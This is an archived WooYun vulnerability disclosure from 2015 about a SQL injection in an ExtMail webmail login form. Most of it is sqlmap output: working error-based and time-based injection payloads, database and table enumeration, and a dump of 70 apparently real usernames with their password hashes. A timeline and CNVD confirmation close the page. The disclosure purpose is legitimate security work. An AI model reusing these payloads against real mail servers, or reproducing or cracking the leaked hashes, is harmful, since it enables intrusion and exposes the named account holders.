乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-30: 细节已通知厂商并且等待厂商处理中 2015-09-02: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-09-12: 细节向核心白帽子及相关领域专家公开 2015-09-22: 细节向普通白帽子公开 2015-10-02: 细节向实习白帽子公开 2015-10-17: 细节向公众公开
RT
SQL注入
http://**.**.**.**/extmail/cgi/index.cgi?error=msg&__mode=show_loginPOST参数:action=valid_login&bakecookie=&domain=*&nosameip=on&password=g00dPa%24%24w0rD&username=gjvdsciedomain参数存在sql注入
sqlmap identified the following injection points with a total of 1823 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: action=valid_login&bakecookie=&domain=' AND (SELECT 8861 FROM(SELECT COUNT(*),CONCAT(0x7171627871,(SELECT (ELT(8861=8861,1))),0x716a6b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YYGz'='YYGz&nosameip=on&password=g00dPa$$w0rD&username=gjvdscie Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: action=valid_login&bakecookie=&domain=' AND (SELECT * FROM (SELECT(SLEEP(5)))AQQO) AND 'KELo'='KELo&nosameip=on&password=g00dPa$$w0rD&username=gjvdscie Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---web application technology: Apache 2.2.14back-end DBMS: MySQL 5.0current user: 'vpopmail@localhost'current database: 'vpopmail'current user is DBA: Falseavailable databases [2]:[*] information_schema[*] vpopmailsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: action=valid_login&bakecookie=&domain=' AND (SELECT 8861 FROM(SELECT COUNT(*),CONCAT(0x7171627871,(SELECT (ELT(8861=8861,1))),0x716a6b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YYGz'='YYGz&nosameip=on&password=g00dPa$$w0rD&username=gjvdscie Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: action=valid_login&bakecookie=&domain=' AND (SELECT * FROM (SELECT(SLEEP(5)))AQQO) AND 'KELo'='KELo&nosameip=on&password=g00dPa$$w0rD&username=gjvdscie Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---web application technology: Apache 2.2.14back-end DBMS: MySQL >= 5.0.0Database: vpopmail[5 tables]+-------------+| dir_control || lastauth || valias || vlog || vpopmail |+-------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: action=valid_login&bakecookie=&domain=' AND (SELECT 8861 FROM(SELECT COUNT(*),CONCAT(0x7171627871,(SELECT (ELT(8861=8861,1))),0x716a6b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YYGz'='YYGz&nosameip=on&password=g00dPa$$w0rD&username=gjvdscie Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: action=valid_login&bakecookie=&domain=' AND (SELECT * FROM (SELECT(SLEEP(5)))AQQO) AND 'KELo'='KELo&nosameip=on&password=g00dPa$$w0rD&username=gjvdscie Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---web application technology: Apache 2.2.14back-end DBMS: MySQL >= 5.0.0Database: vpopmailTable: vpopmail[11 columns]+-----------------+------------------+| Column | Type |+-----------------+------------------+| gid | int(10) unsigned || pw_clear_passwd | char(16) || pw_dir | char(160) || pw_domain | char(64) || pw_gecos | char(48) || pw_gid | int(11) || pw_name | char(32) || pw_passwd | char(40) || pw_shell | char(20) || pw_uid | int(11) || uid | int(10) unsigned |+-----------------+------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: action=valid_login&bakecookie=&domain=' AND (SELECT 8861 FROM(SELECT COUNT(*),CONCAT(0x7171627871,(SELECT (ELT(8861=8861,1))),0x716a6b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YYGz'='YYGz&nosameip=on&password=g00dPa$$w0rD&username=gjvdscie Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: action=valid_login&bakecookie=&domain=' AND (SELECT * FROM (SELECT(SLEEP(5)))AQQO) AND 'KELo'='KELo&nosameip=on&password=g00dPa$$w0rD&username=gjvdscie Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---web application technology: Apache 2.2.14back-end DBMS: MySQL >= 5.0.0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: action=valid_login&bakecookie=&domain=' AND (SELECT 8861 FROM(SELECT COUNT(*),CONCAT(0x7171627871,(SELECT (ELT(8861=8861,1))),0x716a6b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YYGz'='YYGz&nosameip=on&password=g00dPa$$w0rD&username=gjvdscie Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: action=valid_login&bakecookie=&domain=' AND (SELECT * FROM (SELECT(SLEEP(5)))AQQO) AND 'KELo'='KELo&nosameip=on&password=g00dPa$$w0rD&username=gjvdscie Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---web application technology: Apache 2.2.14back-end DBMS: MySQL >= 5.0.0Database: vpopmailTable: vpopmail[70 entries]+----------------+------------------------------------+| pw_name | pw_passwd |+----------------+------------------------------------+| caiwen | $1$u3bF/UQU$f.ah5r/vRlqp.rpPIE.zs1 || dengchaofeng | $1$v6f5WZ91$IaPotF2VYzWppg6cpKRTx0 || dingchunchao | gSfe6YTqgHr3A || du | $1$VS6eLKwT$4tOajARkM6iCtHKxpNkUG/ || fenghui | $1$gHt5hbJk$rUZBZqjVGdztD9i3BvZKY. || gaodehui | $1$RQ1Ozk39$anT9gDgi3mQcTPE0/nmv21 || guofengwei | $1$gjD/XeZt$8DHIrfOX9SxXmxL3OEqX01 || guolihui | $1$pzJ7yAEW$K0cf8hZN53xiQGhXPWQ2g0 || helijuan | $1$ePfxRLq4$PQ21eqzpc9qmQyE6jGGTY1 || huangjinghong | $1$ZoW7zm7Y$ls8dY1/u9kwnMJrihR1e.1 || jiajianjie | .wQ08Ja81NRS2 || jiangxiaozheng | $1$FuKlupgg$MbsVXrzjsJQ9Nb80P2i6U1 || jiayanhong | $1$hISC4PSO$aSqs0GKWZGk87WtVWavOW1 || jidong | UVWB44U29djkI || kuaitiemin | OhI84s.DfqY/A || lidazhi | $1$nl66f2Su$3jmlztrNZcvfBzW55QUK00 || lidechen | $1$x0mdr9VJ$EDG38CXMYP.izO51Ulizk. || lifanghua | $1$R.mSxRfn$nrZ4ukujHiyV.cKI2LSY./ || liuhaipeng | $1$HqIHWLLq$QrIE/T2JXbm5TQyoh9bQl1 || liweijun | $1$.fHxW6zt$CBDbk8MZEm85x6JE8sDR9. || lixiangguo | $1$7grQCZiT$gPskPK1KiBniJnpSO/K0b0 || lizhenjun | $1$gjWona2z$Guy0OePQrYeJmQLeK1xgG1 || luochen | $1$Fqc95JKY$Z.Pa9HV53BulSXyNy558n1 || mashumei | $1$djVR81Tf$H1D/F5OZi2kd.EMJ.2BUr1 || mazhanyou | LlbzMo2hM7vfY || mengqingdong | $1$vJa9kCZe$bkKd1oMI2N5WyVEeiNXEC1 || mengqingyang | $1$V0BG6hKD$KW41Q6Y6pHRrouPpgGhcf0 || ougui | $1$TXm40zlJ$Yzpr7En29XdeGW1L/.qXP1 || pengmin | 7Qhw8xJto3/J2 || postmaster | $1$xigr37rL$TtApHUT6.x8Hto3.MN85i/ || shangdongwei | $1$GtFsCrWC$DffeIwwnMjGva5Xx4EYOt1 || shixiuyan | cTDljbwR2iVgI || sunxiaoping | $1$W10wFXZo$wgnHsmeMmvDWgYg7BIhMU/ || sunzhuoli | .IVl.orVY.tIY || suzhanfu | $1$chskfgTz$8ne5gAVzK82ybUHns3VVd/ || wangchunhai | $1$sCi2n4vv$t6HyLX1syh72qarrYwel.0 || wangchunyan | $1$suh0Q1E7$.NVwou4OcBUF4Ii7NyE2U/ || wanghongyan | $1$zpkhqxzB$gXxyq68OApuA6XVAj4.fW/ || wangjianyu | $1$ispMEKtq$WYvK.S112r71Y7oj5GYHc. || wangjinhu | $1$Y6tTwmx6$rGiQX.VHZ66IOfoGtHB0x1 || wangli | $1$ksEO/Me/$YwngGNPnze8ulPkA1WyI// || wanglijie | $1$ARnG/84H$vV9nDA52TYKTsdz2xn4aZ1 || wangxueshui | $1$30AZvLe8$zZ5U1WAjSbi239.Cd2XbF0 || wenyi | 8xM8R3w1Hfifs || wucuiling | $1$EiD1keOb$1dkR48g8TEZoG7hmhUcAc0 || xiaxiaohong | $1$HFX1Ix/.$frImNZj7KgK9uw8tRwOXm0 || xiezhonghui | $1$irkgTC6u$umivSWNwFAVioBPO62yJ40 || xuhua | $1$13RlkDNr$Us/q6XxlWrhbME9N7EpOw. || yangjianjun | $1$Mcl3CbCe$i8KKXCcOjb7WAUgBNiQUU1 || yangyang | $1$CDC//w7a$F8w2YTgp04TqWTK1P/hyx. || yanyongru | $1$xqQzgOL9$vMcuSgPVwxqLAFxyXBqT8. || yaoxiaojing | $1$48ieWUGx$/qZYJGINCBwDdU90oZG5y. || yinxiuguang | $1$7.HPkB5d$wS3BbL1JcgtDM/5pqIWPb1 || yushuxia | $1$fXjPhg.W$JMHpQ/V/RZNH.2hk5TssN/ || yuxiumin | $1$Klcd6DZV$mr4GvL0JpsxadZ/TwpAmc. || zhaihuimin | 2QWRbB8erHYtY || zhanfulin | $1$.DebbAc2$AmSRBvO/lNfE0i6sicScm/ || zhangchunyan | $1$gt8cNBt2$zFiNBlRvZyGJSxN1AYBjS/ || zhangfuna | $1$riUl0zrY$TFl73XKf7WAJblMdwR2RH. || zhanghuaming | $1$8yePP7SC$/FffkgKjMxRMsiwvfaG.1. || zhangjinglin | $1$tbLX/O1H$IL19GSkgAxEidqFfajav6/ || zhanglei | $1$G5nL1XAK$wxYBlbfyceZoawJX4ZDrK1 || zhangxiujun | $1$PvxKRyUm$vhwE.eRBSPajqe02S7lXY. || zhangying | $1$i/7JnPeH$bB3.eyH9C6rEhHb3XFFJX. || zhangyueli | $1$UDIKEwPj$4BghgqKNPMPoUof8eCllj1 || zhaobingfeng | $1$70boy8y0$6q31HjqryTebbGPYJEbF71 || zhaochanghua | $1$sc.Z8IA2$qwKjZ6B9DRJDHoBvUKaYz0 || zhaofang | $1$0KZq9raG$PVY.l0jaoC9Z.31qfyPf.1 || zhaolijun | $1$aAOQb9zW$S5eEYc.6oN9wOgXtkYjwd/ || zhaoshuqing | $1$neLyW0mx$hSuIkxXhhI/F3mdlWj/1C/ |+----------------+------------------------------------+
参数过滤,管理员帮忙打下码。
危害等级:高
漏洞Rank:10
确认时间:2015-09-02 10:52
CNVD确认并复现所述情况,已经转由CNCERT下发给河北分中心,由其后续协调网站管理单位处置。
暂无
